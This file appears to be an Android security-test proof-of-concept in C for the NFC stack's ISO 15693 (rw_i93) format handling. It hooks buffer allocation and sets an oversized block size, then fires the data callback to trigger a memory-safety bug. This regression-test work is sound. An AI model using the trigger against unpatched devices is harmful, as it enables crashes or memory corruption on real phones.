90 lines
2.3 KiB
90 lines
2.3 KiB
/*
|
|
* Copyright (C) 2021 The Android Open Source Project
|
|
*
|
|
* Licensed under the Apache License, Version 2.0 (the "License");
|
|
* you may not use this file except in compliance with the License.
|
|
* You may obtain a copy of the License at
|
|
*
|
|
* http://www.apache.org/licenses/LICENSE-2.0
|
|
*
|
|
* Unless required by applicable law or agreed to in writing, software
|
|
* distributed under the License is distributed on an "AS IS" BASIS,
|
|
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
|
* See the License for the specific language governing permissions and
|
|
* limitations under the License.
|
|
*/
|
|
|
|
#include <stdlib.h>
|
|
#include <nfc_api.h>
|
|
#include <nfc_int.h>
|
|
#include <rw_int.h>
|
|
#include <tags_defs.h>
|
|
|
|
#include "../includes/common.h"
|
|
#include "../includes/memutils.h"
|
|
|
|
char enable_selective_overload = ENABLE_NONE;
|
|
|
|
// borrowed from rw_i93.cc
|
|
#define RW_I93_FORMAT_DATA_LEN 8
|
|
|
|
extern tRW_CB rw_cb;
|
|
extern tNFC_CB nfc_cb;
|
|
void rw_init(void);
|
|
tNFC_STATUS rw_i93_select(uint8_t* p_uid);
|
|
void* vulnerable_ptr;
|
|
|
|
void* GKI_getbuf(uint16_t size) {
|
|
void* ptr = malloc(size);
|
|
if (size == RW_I93_FORMAT_DATA_LEN) {
|
|
vulnerable_ptr = ptr;
|
|
}
|
|
return ptr;
|
|
}
|
|
|
|
void GKI_freebuf(void* p_buf) {
|
|
if (p_buf == vulnerable_ptr) {
|
|
free(p_buf);
|
|
}
|
|
}
|
|
|
|
int main() {
|
|
enable_selective_overload = ENABLE_ALL;
|
|
tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
|
|
|
|
GKI_init();
|
|
rw_init();
|
|
|
|
uint8_t p_uid = 1;
|
|
if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
|
|
tNFC_CONN_EVT event = NFC_DATA_CEVT;
|
|
|
|
tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
|
|
if (!p_data) {
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
|
|
if (!(p_data->data.p_data)) {
|
|
free(p_data);
|
|
return EXIT_FAILURE;
|
|
}
|
|
|
|
p_i93->state = RW_I93_STATE_FORMAT;
|
|
p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
|
|
p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
|
|
p_data->status = NFC_STATUS_OK;
|
|
TIMER_LIST_ENT pFirst = {};
|
|
nfc_cb.quick_timer_queue.p_first = &pFirst;
|
|
|
|
p_cb->p_cback(0, event, p_data);
|
|
free(p_data->data.p_data);
|
|
free(p_data);
|
|
enable_selective_overload = ENABLE_NONE;
|
|
return EXIT_SUCCESS;
|
|
}
|